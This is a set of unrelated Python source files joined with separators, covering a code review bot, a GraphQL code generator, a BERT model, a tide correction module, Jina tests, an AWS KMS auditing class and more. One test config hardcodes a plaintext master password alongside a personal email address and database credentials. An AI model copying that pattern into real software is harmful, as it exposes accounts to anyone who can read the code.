The review object.
settings (dict, optional):
Tool-specific settings.
repository (reviewbot.repositories.Repository, optional):
The repository.
base_commit_id (unicode, optional):
The ID of the commit that the patch should be applied to.
"""
repository.sync()
working_dir = repository.checkout(base_commit_id)
# Patch all the files first.
with chdir(working_dir):
for f in review.files:
self.logger.debug('Patching %s', f.dest_file)
ensure_dirs_exist(os.path.abspath(f.dest_file))
with open(f.dest_file, 'wb') as fp:
fp.write(f.patched_file_contents)
f.patched_file_path = f.dest_file
# Now run the tool for everything.
super(FullRepositoryToolMixin, self).execute(review, **kwargs)
class JavaToolMixin(object):
"""Mixin for Java-based tools.
Version Added:
3.0
"""
#: Main class to call to run the Java application.
#:
#: Type:
#: unicode
java_main = None
#: The key identifying the classpaths to use.
#:
#: Type:
#: unicode
java_classpaths_key = None
exe_dependencies = ['java']
def check_dependencies(self):
"""Verify the tool's dependencies are installed.
This will invoke the base class's dependency checking, ensuring that
:command:`java` is available, and will then attempt to run the
configured Java class (:py:attr:`java_main`), checking that it could
be found.
Returns:
bool:
True if all dependencies for the tool are satisfied. If this
returns False, the worker will not listen for this Tool's queue,
and a warning will be logged.
"""
if not super(JavaToolMixin, self).check_dependencies():
return False
classpath = \
config['java_classpaths'].get(self.java_classpaths_key, [])
if not self._check_java_classpath(classpath):
return False
output = execute(self._build_java_command(),
ignore_errors=True)
return 'Could not find or load main class' not in output
def build_base_command(self, **kwargs):
"""Build the base command line used to review files.
Args:
**kwargs (dict, unused):
Additional keyword arguments.
Returns:
list of unicode:
The base command line.
"""
return self._build_java_command(**kwargs)
def _build_java_command(self):
"""Return the base Java command for running the class.
This will build the class path and command line for running
:py:attr:`java_main`.
Returns:
list of unicode:
The base command line for running the Java class.
"""
classpath = ':'.join(
config['java_classpaths'].get(self.java_classpaths_key, []))
cmdline = [config['exe_paths']['java']]
if classpath:
cmdline += ['-cp', classpath]
cmdline.append(self.java_main)
return cmdline
def _check_java_classpath(self, classpath):
"""Return whether all entries in a classpath exist.
Args:
classpath (list of unicode):
The classpath locations.
Returns:
bool:
``True`` if all entries exist on the filesystem. ``False`` if
one or more are missing.
"""
if not classpath:
return False
for path in classpath:
if not path or not os.path.exists(path):
return False
return True
|
import re
import random
import os
methodTmpl = """
func (r *{$typeName}Resolver) {$method}() {$fieldType} {
{$value}
return {$res}
}
"""
tmplHeader = """
package resolver
{$import}
type {$typeName}Resolver struct {
//m *model.{$typeName}
}
"""
importTmplOrigin = 'import (\n //"pinjihui.com/pinjihui/model"'
first_lower = lambda s: s[:1].lower() + s[1:] if s else ''
first_upper = lambda s: s[:1].upper() + s[1:] if s else ''
pattern = re.compile(r'type (\w+) \{\s+?([^\}]+)\n\}')
fieldPattern = re.compile(r'(\w+?): (\w+|\[(\w+)(!)?\])(!)?')
enumPattern = re.compile(r'enum (\w+) \{([^\}]+)\}')
basicTypeMap = {"Int": "int32", "Float": 'float64', "String": "string", "Boolean": "bool"}
def initValue(typeName, enumType = None,enumsMap = None):
typeMapValue = {"int32": "int32(3)",
"float64": "0.0",
"string": '"test string"',
"bool": "false",
"enum": '"%s"' % enumsMap[enumType][0] if enumType != None else "",
"graphql.ID": 'graphql.ID("xjauwkahsi92h1j")',
"graphql.Time, error": 'time.Parse(time.RFC3339, "2018-04-01 12:04:56.539453")'
}
return typeMapValue[typeName] if typeName in typeMapValue else "%s{}" % (typeName)
def hump2underline(hunp_str):
'''
驼峰形式字符串转成下划线形式
:param hunp_str: 驼峰形式字符串
:return: 字母全小写的下划线形式字符串
'''
# 匹配正则,匹配小写字母和大写字母的分界位置
p = re.compile(r'([a-z]|\d)([A-Z])')
# 这里第二个参数使用了正则分组的后向引用
sub = re.sub(p, r'\1_\2', hunp_str).lower()
return sub
def generate(file):
tmpl = tmplHeader
def shouldReturnPoint(isRequire, goFieldType):
return isRequire == None or goFieldType.endswith("Resolver")
with open(file, 'r') as f:
data = f.read()
data = re.sub(r'\s+?#.*$', "", data, 0, re.M)
res = re.match(pattern, data)
if res == None:
return -1
# print(res.group(0))
typeName = res.group(1)
print("typeName:" + typeName)
enumsTypes = re.findall(enumPattern, data)
enums = [x[0] for x in enumsTypes]
enumsMap = {e[0]:e[1].strip().split("\n ") for e in enumsTypes}
print("enums:", enumsMap)
print(res.group(2).split("\n"))
fields = [re.match(fieldPattern, x.strip()).groups() for x in res.group(2).split("\n")]
# print(fields)
shouldImportTime = False
should_import_graphql_go = False
for field in fields:
methodTmplNew = methodTmpl
gqlFieldType = field[1]
isArray = False
if gqlFieldType.startswith("["):
gqlFieldType = field[2]
isArray = True
value = None
if gqlFieldType in ["Int", "String", "Boolean", "Float"]:
goFieldType = basicTypeMap[gqlFieldType]
elif gqlFieldType in enums:
goFieldType = "string"
random.shuffle(enumsMap[gqlFieldType])
value = initValue('enum', gqlFieldType, enumsMap)
elif gqlFieldType == "ID":
goFieldType = "graphql.ID"
value = 'graphql.ID("xjauwkahsi92h1j")'
should_import_graphql_go = True
elif gqlFieldType == "Time":
shouldImportTime = True
should_import_graphql_go = True
goFieldType = "graphql.Time, error"
else:
goFieldType = first_lower(gqlFieldType) + "Resolver"
if value == None:
value = initValue(goFieldType)
if isArray:
refSybol = ""
if shouldReturnPoint(field[3], goFieldType):
refSybol = "&"
goFieldType = "*" + goFieldType
goFieldType = "[]" + goFieldType
value = "make(%s, 3)" % goFieldType + """
for i := range res {
v := %s
res[i] = %sv
}""" % (value, refSybol)
if shouldReturnPoint(field[4], goFieldType):
goFieldType = "*" + goFieldType
res = "res"
if gqlFieldType == "Time":
goFieldType = "(" + goFieldType + ")"
value = "res, err := " + value
res = "graphql.Time{Time: res}, err"
else:
value = "res := " + value
if shouldReturnPoint(field[4], goFieldType):
res = '&' + res
method = "ID" if field[0] == 'id' else first_upper(field[0])
methodTmplNew = methodTmplNew.replace("{$method}", method)
methodTmplNew = methodTmplNew.replace("{$res}", res)
methodTmplNew = methodTmplNew.replace("{$value}", value)
tmpl += methodTmplNew.replace("{$fieldType}", goFieldType)
importTmpl = importTmplOrigin
if shouldImportTime:
importTmpl += '\n "time"'
if should_import_graphql_go:
importTmpl += '\n "github.com/graph-gophers/graphql-go"'
importTmpl += "\n)"
tmpl = tmpl.replace("{$import}", first_lower(importTmpl))
tmpl = tmpl.replace("{$typeName}", first_lower(typeName))
resolverFile = "/home/wangbo/go/src/pinjihui.com/pinjihui/resolver/" + hump2underline(typeName) + ".go"
with open(resolverFile, 'w') as rf:
rf.write(tmpl)
return 0
if __name__ == '__main__':
dirname = "/home/wangbo/go/src/pinjihui.com/pinjihui/schema/type"
typeFiles = [os.path.join(dirname, name) for name in os.listdir(dirname)
if name.endswith(".graphql") and not name.startswith("user") and not name == "page_info.graphql"]
for file in typeFiles:
print("generate %s" % file)
generate(file)
|
from decimal import ROUND_DOWN, Decimal
from subprocess import check_output
def crypto_truncate(amount):
d = Decimal(amount)
return d.quantize(Decimal('0.00000001'), rounding=ROUND_DOWN)
def run(args, split="\n"):
output_byt = check_output(args)
return output_byt.decode("utf-8").split(split)
|
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors and The HuggingFace Inc. team.
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""PyTorch BERT model."""
from __future__ import absolute_import, division, print_function, unicode_literals
import copy
import json
import math
import os
import shutil
import tarfile
import tempfile
import sys
from io import open
import torch
from torch import nn
from torch.nn import CrossEntropyLoss
from pytorch_pretrained_bert.file_utils import cached_path, WEIGHTS_NAME, CONFIG_NAME
from pytorch_pretrained_bert.modeling import ACT2FN, BertConfig, BertIntermediate, \
BertSelfAttention, BertPreTrainedModel
class BertLayerNorm(nn.Module):
def __init__(self, hidden_size, eps=1e-12):
super(BertLayerNorm, self).__init__()
self.weight = nn.Parameter(torch.ones(hidden_size))
self.bias = nn.Parameter(torch.zeros(hidden_size))
self.variance_epsilon = eps
def forward(self, x):
u = x.mean(-1, keepdim=True)
s = (x - u).pow(2).mean(-1, keepdim=True)
x = (x - u) / torch.sqrt(s + self.variance_epsilon)
return self.weight * x + self.bias
class BertLayerNormNoVar(nn.Module):
def __init__(self, hidden_size, eps=1e-12):
super(BertLayerNormNoVar, self).__init__()
self.weight = nn.Parameter(torch.ones(hidden_size))
self.bias = nn.Parameter(torch.zeros(hidden_size))
self.variance_epsilon = eps
def forward(self, x):
u = x.mean(-1, keepdim=True)
x = x - u
return self.weight * x + self.bias
class BertEmbeddings(nn.Module):
"""Construct the embeddings from word, position and token_type embeddings.
"""
def __init__(self, config, glove=None, vocab=None):
super(BertEmbeddings, self).__init__()
self.word_embeddings = nn.Embedding(config.vocab_size, config.embedding_size, padding_idx=0)
self.position_embeddings = nn.Embedding(config.max_position_embeddings, config.embedding_size)
self.token_type_embeddings = nn.Embedding(config.type_vocab_size, config.embedding_size)
self.config = config
def forward(self, input_ids, token_type_ids=None):
seq_length = input_ids.size(1)
position_ids = torch.arange(seq_length, dtype=torch.long, device=input_ids.device)
position_ids = position_ids.unsqueeze(0).expand_as(input_ids)
if token_type_ids is None:
token_type_ids = torch.zeros_like(input_ids)
words_embeddings = self.word_embeddings(input_ids)
position_embeddings = self.position_embeddings(position_ids)
token_type_embeddings = self.token_type_embeddings(token_type_ids)
# position/token_type embedding disabled
# embeddings = words_embeddings + position_embeddings + token_type_embeddings
embeddings = words_embeddings
return embeddings
class BertSelfOutput(nn.Module):
def __init__(self, config):
super(BertSelfOutput, self).__init__()
self.config = config
self.dense = nn.Linear(config.hidden_size, config.hidden_size)
if hasattr(config, "layer_norm") and config.layer_norm == "no_var":
self.LayerNorm = BertLayerNormNoVar(config.hidden_size, eps=1e-12)
else:
self.LayerNorm = BertLayerNorm(config.hidden_size, eps=1e-12)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
def forward(self, hidden_states, input_tensor):
hidden_states = self.dense(hidden_states)
hidden_states = self.dropout(hidden_states)
if hidden_states.shape[-1] == input_tensor.shape[-1]:
hidden_states = hidden_states + input_tensor
if hasattr(self.config, "layer_norm") and self.config.layer_norm == "no":
pass
else:
hidden_states = self.LayerNorm(hidden_states)
return hidden_states
class BertAttention(nn.Module):
def __init__(self, config, input_size):
super(BertAttention, self).__init__()
self.self = BertSelfAttention(config)
self.output = BertSelfOutput(config)
def forward(self, input_tensor, attention_mask):
self_output = self.self(input_tensor, attention_mask)
attention_output = self.output(self_output, input_tensor)
return attention_output
class BertOutput(nn.Module):
def __init__(self, config):
super(BertOutput, self).__init__()
self.config = config
self.dense = nn.Linear(config.intermediate_size, config.hidden_size)
if hasattr(config, "layer_norm") and config.layer_norm == "no_var":
self.LayerNorm = BertLayerNormNoVar(config.hidden_size, eps=1e-12)
else:
self.LayerNorm = BertLayerNorm(config.hidden_size, eps=1e-12)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
def forward(self, hidden_states, input_tensor):
hidden_states = self.dense(hidden_states)
hidden_states = self.dropout(hidden_states)
hidden_states = hidden_states + input_tensor
if hasattr(self.config, "layer_norm") and self.config.layer_norm == "no":
pass
else:
hidden_states = self.LayerNorm(hidden_states)
return hidden_states
class BertLayer(nn.Module):
def __init__(self, config, layer_id):
super(BertLayer, self).__init__()
self.input_size = config.hidden_size
self.attention = BertAttention(config, self.input_size)
self.intermediate = BertIntermediate(config)
self.output = BertOutput(config)
def forward(self, hidden_states, attention_mask):
attention_output = self.attention(hidden_states, attention_mask)
intermediate_output = self.intermediate(attention_output)
layer_output = self.output(intermediate_output, attention_output)
return layer_output
class BertEncoder(nn.Module):
def __init__(self, config):
super(BertEncoder, self).__init__()
self.layer = nn.ModuleList([BertLayer(config, i) for i in range(config.num_hidden_layers)])
def forward(self, hidden_states, attention_mask, output_all_encoded_layers=True):
all_encoder_layers = []
for layer_module in self.layer:
hidden_states = layer_module(hidden_states, attention_mask)
if output_all_encoded_layers:
all_encoder_layers.append(hidden_states)
if not output_all_encoded_layers:
all_encoder_layers.append(hidden_states)
return all_encoder_layers
class BertPooler(nn.Module):
def __init__(self, config):
super(BertPooler, self).__init__()
self.dense = nn.Linear(config.hidden_size, config.hidden_size)
self.activation = nn.Tanh()
def forward(self, hidden_states):
# We "pool" the model by simply taking the hidden state corresponding
# to the first token.
first_token_tensor = hidden_states[:, 0]
pooled_output = self.dense(first_token_tensor)
pooled_output = self.activation(pooled_output)
return pooled_output
class BertModelFromEmbeddings(BertPreTrainedModel):
def __init__(self, config):
super(BertModelFromEmbeddings, self).__init__(config)
self.encoder = BertEncoder(config)
self.pooler = BertPooler(config)
self.apply(self.init_bert_weights)
def forward(self, embeddings, extended_attention_mask):
encoded_layers = self.encoder(embeddings, extended_attention_mask)
sequence_output = encoded_layers[-1]
pooled_output = self.pooler(sequence_output)
return pooled_output
class BertForSequenceClassificationFromEmbeddings(BertPreTrainedModel):
def __init__(self, config, num_labels=2):
super(BertForSequenceClassificationFromEmbeddings, self).__init__(config)
self.num_labels = num_labels
self.bert = BertModelFromEmbeddings(config)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
self.classifier = nn.Linear(config.hidden_size, num_labels)
self.linear_in = nn.Linear(config.embedding_size, config.hidden_size)
self.layer_norm = config.layer_norm
if hasattr(config, "layer_norm") and config.layer_norm == "no_var":
self.LayerNorm = BertLayerNormNoVar(config.embedding_size, eps=1e-12)
else:
self.LayerNorm = BertLayerNorm(config.embedding_size, eps=1e-12)
self.apply(self.init_bert_weights)
def forward(self, embeddings, extended_attention_mask):
embeddings = self.linear_in(embeddings)
if self.layer_norm == "no":
pass
else:
embeddings = self.LayerNorm(embeddings)
embeddings = self.dropout(embeddings)
pooled_output = self.bert(embeddings, extended_attention_mask)
pooled_output = self.dropout(pooled_output)
logits = self.classifier(pooled_output)
return logits
class BertForSequenceClassification(BertPreTrainedModel):
def __init__(self, config, num_labels=2, glove=None, vocab=None):
super(BertForSequenceClassification, self).__init__(config)
self.model_from_embeddings = BertForSequenceClassificationFromEmbeddings(
config, num_labels
)
self.num_labels = num_labels
self.embeddings = BertEmbeddings(config, glove=glove, vocab=vocab)
self.apply(self.init_bert_weights)
def forward(self, input_ids, token_type_ids=None, attention_mask=None, embed_only=False):
if attention_mask is None:
attention_mask = torch.ones_like(input_ids)
if token_type_ids is None:
token_type_ids = torch.zeros_like(input_ids)
extended_attention_mask = attention_mask.unsqueeze(1).unsqueeze(2)
extended_attention_mask = extended_attention_mask.to(dtype=next(self.parameters()).dtype) # fp16 compatibility
extended_attention_mask = (1.0 - extended_attention_mask) * -10000.0
embeddings = self.embeddings(input_ids, token_type_ids)
if embed_only:
return embeddings, extended_attention_mask
logits = self.model_from_embeddings(embeddings, extended_attention_mask)
return logits
|
from django.apps import AppConfig
class ToolConfig(AppConfig):
name = 'tool'
|
from setuptools import setup
setup(
name='html-compiler',
version='0.1',
author='Hsuan-Hau Liu',
description='A simple and lightweight html compiler.',
packages=['html_compiler',],
install_requires=['beautifulsoup4'],
entry_points={
'console_scripts': [
'html_compiler=html_compiler.__main__:main'
]
}
)
|
# -*- coding: utf-8 -*-
from datetime import datetime, timezone
import time
import threading
import queue
import tidegravity as tide
def point_correction(lat, lon, alt=0, date=datetime.utcnow()):
"""Solve tidal correction for a static point and time"""
gm, gs, g0 = tide.solve_longman_tide_scalar(lat, lon, alt, date)
message = {'gm': gm, 'gs': gs, 'g0': g0, 'ts': date.timestamp()}
return message
def series_correction(lat, lon, alt=0, date=datetime.now(tz=timezone.utc), fields=None):
df = tide.solve_point_corr(lat, lon, alt, date, n=3600, increment='T')
if fields is None:
fields = ['g0']
result = []
for i, line in df.iterrows():
data = {k: line[k] for k in fields}
data['ts'] = line.name.timestamp()
result.append(data)
return result
def _tide_generator(lat, lon, alt):
while True:
ts = yield
yield point_correction(lat, lon, alt, ts)
def get_tide_generator(lat, lon, alt):
gen = _tide_generator(lat, lon, alt)
gen.send(None)
return gen
class ThreadedTideGenerator(threading.Thread):
def __init__(self, lat, lon, alt, start_ts=None, publish_queue=None):
super().__init__()
self._exiting = threading.Event()
self._sleep = 60
self._queue = publish_queue or queue.Queue()
self.lat = lat
self.lon = lon
self.alt = alt
self._start_time = start_ts or time.time()
@property
def queue(self):
return self._queue
def run(self):
delta_ts = self._start_time - time.time()
if delta_ts > 0:
time.sleep(delta_ts)
while not self._exiting.is_set():
ts = datetime.now(tz=timezone.utc)
gm, gs, g0 = point_correction(self.lat, self.lon, self.alt, date=ts)
message = {'gm': gm, 'gs': gs, 'g0': g0, 'ts': ts}
self._queue.put_nowait(message)
time.sleep(self._sleep)
|
import unittest
from jina.main.parser import set_pea_parser, set_pod_parser, set_gateway_parser
from jina.peapods.gateway import GatewayPea
from jina.peapods.pea import BasePea
from jina.peapods.pod import BasePod, GatewayPod, MutablePod, GatewayFlowPod, FlowPod
from tests import JinaTestCase
class PeaPodsTestCase(JinaTestCase):
def test_pea_context(self):
def _test_pea_context(runtime):
args = set_pea_parser().parse_args(['--runtime', runtime])
with BasePea(args):
pass
BasePea(args).start().close()
for j in ('process', 'thread'):
with self.subTest(runtime=j):
_test_pea_context(j)
def test_address_in_use(self):
args1 = set_pea_parser().parse_args(['--port-ctrl', '55555'])
args2 = set_pea_parser().parse_args(['--port-ctrl', '55555'])
with BasePea(args1), BasePea(args2):
pass
args1 = set_pea_parser().parse_args(['--port-ctrl', '55555', '--runtime', 'thread'])
args2 = set_pea_parser().parse_args(['--port-ctrl', '55555', '--runtime', 'thread'])
with BasePea(args1), BasePea(args2):
pass
print('everything should quit gracefully')
def test_pod_context(self):
def _test_pod_context(runtime):
args = set_pod_parser().parse_args(['--runtime', runtime, '--parallel', '2'])
with BasePod(args):
pass
BasePod(args).start().close()
for j in ('process', 'thread'):
with self.subTest(runtime=j):
_test_pod_context(j)
def test_gateway_pea(self):
def _test_gateway_pea(runtime):
args = set_gateway_parser().parse_args(['--runtime', runtime])
with GatewayPea(args):
pass
GatewayPea(args).start().close()
for j in ('process', 'thread'):
with self.subTest(runtime=j):
_test_gateway_pea(j)
def test_gateway_pod(self):
def _test_gateway_pod(runtime):
args = set_gateway_parser().parse_args(['--runtime', runtime])
with GatewayPod(args):
pass
GatewayPod(args).start().close()
for j in ('process', 'thread'):
with self.subTest(runtime=j):
_test_gateway_pod(j)
def test_gatewayflow_pod(self):
def _test_gateway_pod(runtime):
with GatewayFlowPod({'runtime': runtime}):
pass
GatewayFlowPod({'runtime': runtime}).start().close()
for j in ('process', 'thread'):
with self.subTest(runtime=j):
_test_gateway_pod(j)
def test_mutable_pod(self):
def _test_mutable_pod(runtime):
args = set_pod_parser().parse_args(['--runtime', runtime, '--parallel', '2'])
with MutablePod(BasePod(args).peas_args):
pass
MutablePod(BasePod(args).peas_args).start().close()
for j in ('process', 'thread'):
with self.subTest(runtime=j):
_test_mutable_pod(j)
def test_flow_pod(self):
def _test_flow_pod(runtime):
args = {'runtime': runtime, 'parallel': 2}
with FlowPod(args):
pass
FlowPod(args).start().close()
for j in ('process', 'thread'):
with self.subTest(runtime=j):
_test_flow_pod(j)
def test_pod_context_autoshutdown(self):
def _test_pod_context(runtime):
args = set_pod_parser().parse_args(['--runtime', runtime,
'--parallel', '2',
'--max-idle-time', '5',
'--shutdown-idle'])
with BasePod(args) as bp:
bp.join()
BasePod(args).start().close()
for j in ('process', 'thread'):
with self.subTest(runtime=j):
_test_pod_context(j)
def test_peas_naming_with_parallel(self):
args = set_pod_parser().parse_args(['--name', 'pod',
'--parallel', '2',
'--max-idle-time', '5',
'--shutdown-idle'])
with BasePod(args) as bp:
self.assertEqual(bp.peas[0].name, 'pod-head')
self.assertEqual(bp.peas[1].name, 'pod-tail')
self.assertEqual(bp.peas[2].name, 'pod-1')
self.assertEqual(bp.peas[3].name, 'pod-2')
if __name__ == '__main__':
unittest.main()
|
# pylint: disable=missing-module-docstring,missing-class-docstring,missing-function-docstring,line-too-long
from eze.core.reporter import ReporterMeta
from tests.__fixtures__.fixture_helper import get_snapshot_directory
class ReporterMetaTestBase:
ReporterMetaClass = ReporterMeta
SNAPSHOT_PREFIX = "reporter-meta"
def test_help_text_fields(self, snapshot):
# When
short_description_output = self.ReporterMetaClass.short_description()
config_output = self.ReporterMetaClass.config_help()
install_output = self.ReporterMetaClass.install_help()
license_output = self.ReporterMetaClass.license()
more_info_output = self.ReporterMetaClass.more_info()
# Then
output = f"""short_description:
======================
{short_description_output}
config_help:
======================
{config_output}
install_help:
======================
{install_output}
license:
======================
{license_output}
more_info:
======================
{more_info_output}
"""
# WARNING: this is a snapshot test, any changes to format will edit this and the snapshot will need to be updated
snapshot.snapshot_dir = get_snapshot_directory()
snapshot.assert_match(output, f"plugins_reporters/{self.SNAPSHOT_PREFIX}-help_text.txt")
def test_license__not_unknown(self):
# Given
unexpected_license = "Unknown"
# When
output = self.ReporterMetaClass.license()
# Then
assert output != unexpected_license
def test_install_help(self, snapshot):
# When
output = self.ReporterMetaClass.install_help()
# Then
# WARNING: this is a snapshot test, any changes to format will edit this and the snapshot will need to be updated
snapshot.snapshot_dir = get_snapshot_directory()
snapshot.assert_match(output, f"plugins_reporters/{self.SNAPSHOT_PREFIX}-install-help.txt")
|
import os
basedir = os.path.abspath(os.path.dirname(__file__))
SQLALCHEMY_DATABASE_URI = "postgresql://ed_user:ed_pass@localhost/stardrive_test"
TESTING = True
CORS_ENABLED = True
DEBUG = False
DEVELOPMENT = False
MASTER_URL = "http://localhost:5000"
MASTER_EMAIL = "daniel.h.funk@gmail.com"
MASTER_PASS = "dfunk7"
MIRRORING = False
DELETE_RECORDS = False
ELASTIC_SEARCH = {
"index_prefix": "stardrive_test",
"hosts": ["localhost"],
"port": 9200,
"timeout": 20,
"verify_certs": False,
"use_ssl": False,
"http_auth_user": "",
"http_auth_pass": ""
}
#: Default attribute map for single signon.
# This makes it a little easier to spoof the values that come back from
# Shibboleth. One of the aspects of constructing custom headers is that
# they are automatically converted to META Keys, so we have to refer
# to them as that when pulling them out. This is slightly different from
# the structure that actually comes back from Shibboleth.
SSO_ATTRIBUTE_MAP = {
'HTTP_EPPN': (True, 'eppn'), # dhf8r@virginia.edu
'HTTP_UID': (False, 'uid'), # dhf8r
'HTTP_GIVENNAME': (False, 'givenName'), # Daniel
'HTTP_MAIL': (False, 'email') # dhf8r@Virginia.EDU
}
GOOGLE_MAPS_API_KEY = "TEST_API_KEY_GOES_HERE" |
"""
Copyright 2020 Skyscanner Ltd
Licensed under the Apache License, Version 2.0 (the "License"); you may not use
this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software distributed
under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
import json
from lambdaguard.core.AWS import AWS
from lambdaguard.utils.log import debug
class KMS(AWS):
def __init__(self, arn, profile=None, access_key_id=None, secret_access_key=None):
super().__init__(arn, profile, access_key_id, secret_access_key)
self.policies = {}
self.rotation = False
self.info = "https://{0}.console.aws.amazon.com/kms/home?region={0}#/kms/keys/{1}/".format(
self.arn.region, self.arn.resource
)
self.get_policies()
def get_policies(self):
"""
Fetches list of applicable key policy names
"""
try:
paginator = self.client.get_paginator("list_key_policies")
pages = paginator.paginate(KeyId=self.arn.resource)
for page in pages:
for policy_name in page["PolicyNames"]:
self.get_policy(policy_name)
except Exception:
debug(self.arn.full)
def get_policy(self, policy_name):
"""
Fetches key policy by name
"""
try:
policy = json.loads(self.client.get_key_policy(KeyId=self.arn.resource, PolicyName=policy_name)["Policy"])
self.policies[policy_name] = policy
except Exception:
debug(self.arn.full)
def get_rotation_status(self):
"""
Fetches automatic key rotation status
"""
try:
status = self.client.get_key_rotation_status(KeyId=self.arn.resource)
self.rotation = status["KeyRotationEnabled"]
except Exception:
debug(self.arn.full)
|
# -*- coding: utf-8 -*-
# pylint: disable=C0103
"""
This module contains a basic Word Model
"""
from __future__ import annotations
from flask_sqlalchemy import BaseQuery
from loglan_db import db
from loglan_db.model_db import t_name_words, \
t_name_types, t_name_events
from loglan_db.model_db.base_author import BaseAuthor
from loglan_db.model_db.base_connect_tables import \
t_connect_authors, t_connect_words, t_connect_keys
from loglan_db.model_db.base_definition import BaseDefinition
from loglan_db.model_db.base_event import BaseEvent
from loglan_db.model_db.base_key import BaseKey
from loglan_db.model_db.base_type import BaseType
from loglan_db.model_init import InitBase, DBBase
__pdoc__ = {
'BaseWord.created': False, 'BaseWord.updated': False,
}
class BaseWord(db.Model, InitBase, DBBase):
"""BaseWord model"""
__tablename__ = t_name_words
id = db.Column(db.Integer, primary_key=True)
"""Word's internal ID number: Integer"""
name = db.Column(db.String(64), nullable=False)
origin = db.Column(db.String(128))
origin_x = db.Column(db.String(64))
match = db.Column(db.String(8))
rank = db.Column(db.String(8))
year = db.Column(db.Date)
notes = db.Column(db.JSON)
# Fields for legacy database compatibility
id_old = db.Column(db.Integer, nullable=False)
TID_old = db.Column(db.Integer) # references
# Relationships
type_id = db.Column("type", db.ForeignKey(f'{t_name_types}.id'), nullable=False)
_type: BaseType = db.relationship(
BaseType.__name__, back_populates="_words")
event_start_id = db.Column(
"event_start", db.ForeignKey(f'{t_name_events}.id'), nullable=False)
_event_start: BaseEvent = db.relationship(
BaseEvent.__name__, foreign_keys=[event_start_id],
back_populates="_appeared_words")
event_end_id = db.Column("event_end", db.ForeignKey(f'{t_name_events}.id'))
_event_end: BaseEvent = db.relationship(
BaseEvent.__name__, foreign_keys=[event_end_id],
back_populates="_deprecated_words")
_authors: BaseQuery = db.relationship(
BaseAuthor.__name__, secondary=t_connect_authors,
back_populates="_contribution", lazy='dynamic', enable_typechecks=False)
_definitions: BaseQuery = db.relationship(
BaseDefinition.__name__, back_populates="_source_word", lazy='dynamic')
# word's derivatives
_derivatives = db.relationship(
'BaseWord', secondary=t_connect_words,
primaryjoin=(t_connect_words.c.parent_id == id),
secondaryjoin=(t_connect_words.c.child_id == id),
backref=db.backref('_parents', lazy='dynamic', enable_typechecks=False),
lazy='dynamic', enable_typechecks=False)
@property
def type(self) -> BaseQuery:
return self._type
@property
def event_start(self) -> BaseQuery:
return self._event_start
@property
def event_end(self) -> BaseQuery:
return self._event_end
@property
def authors(self) -> BaseQuery:
return self._authors
@property
def definitions(self) -> BaseQuery:
return self._definitions
@property
def derivatives(self) -> BaseQuery:
return self._derivatives
def query_derivatives(
self, word_type: str = None, word_type_x: str = None,
word_group: str = None) -> BaseQuery:
"""Query to get all derivatives of the word, depending on its parameters
Args:
word_type: str: (Default value = None)
E.g. "2-Cpx", "C-Prim", "LW"<hr>
word_type_x: str: (Default value = None)
E.g. "Predicate", "Name", "Affix"<hr>
word_group: str: (Default value = None)
E.g. "Cpx", "Prim", "Little"<hr>
Returns:
BaseQuery
"""
type_values = [
(BaseType.type, word_type),
(BaseType.type_x, word_type_x),
(BaseType.group, word_group), ]
type_filters = [i[0] == i[1] for i in type_values if i[1]]
return self._derivatives.join(BaseType)\
.filter(self.id == t_connect_words.c.parent_id, *type_filters)\
.order_by(type(self).name.asc())
@property
def parents(self) -> BaseQuery:
"""Query to get all parents for Complexes, Little words or Affixes
Returns:
BaseQuery
"""
return self._parents
@property
def complexes(self) -> BaseQuery:
"""
Get all word's complexes if exist
Only primitives and Little Words have complexes.
Returns:
BaseQuery
"""
return self.query_derivatives(word_group="Cpx")
@property
def affixes(self) -> BaseQuery:
"""
Get all word's affixes if exist
Only primitives have affixes.
Returns:
BaseQuery
"""
return self.query_derivatives(word_type="Afx")
@property
def keys(self) -> BaseQuery:
"""Get all BaseKey object related to this BaseWord.
Keep in mind that duplicated keys from related definitions
will be counted with ```.count()``` but excluded from ```.all()``` request
Returns:
BaseQuery
"""
return BaseKey.query.join(
t_connect_keys, BaseDefinition, BaseWord).filter(BaseWord.id == self.id)
|
class IncorrectParametersException(Exception):
pass
class APIErrorException(Exception):
pass
|
from __future__ import print_function, division
import numpy as np
from .fitmodel import FitModel
class Gaussian(FitModel):
"""Gaussian fitting model.
Parameters are xoffset, yoffset, sigma, and amp.
"""
def __init__(self):
FitModel.__init__(self, self.gaussian, independent_vars=['x'])
@staticmethod
def gaussian(x, xoffset, yoffset, sigma, amp):
return amp * np.exp(-((x-xoffset)**2) / (2 * sigma**2)) + yoffset
|
from setuptools import setup, find_packages
setup(name='django-response-mid',
version='2.1',
description='django response middleware',
classifiers=[
'Programming Language :: Python',
'Intended Audience :: Developers',
'Operating System :: OS Independent',
],
url='https://github.com/txf402066270/django-midd/',
author='wu-di-tian-ge-ge',
author_email='402066270@qq.com',
license='NEU',
packages=find_packages(),
zip_safe=True,
install_requires=['django', 'djangorestframework']
)
|
import pandas as pd
from neatrader.utils import small_date, from_small_date
from ta.utils import dropna
from ta.trend import MACD
from ta.volatility import BollingerBands
from ta.momentum import RSIIndicator
class TrainingSetGenerator:
def __init__(self, source_path):
self.source_path = source_path
def generate(self):
df = pd.read_csv(self.source_path / 'close.csv', parse_dates=['date'], date_parser=from_small_date)
df = dropna(df)
close = df['close']
self._macd(df, close)
self._bollinger_bands(df, close)
self._rsi(df, close)
return df
def to_csv(self, out_path=None, cv_proportion=0.2):
file_path = out_path if out_path else self.source_path
df = self.generate()
df['date'] = df['date'].apply(small_date)
size = len(df)
training_size = int(size * (1 - cv_proportion))
df[:training_size].to_csv(file_path / 'training.csv', encoding='utf-8', index=False)
# cross validation always uses the most recent data
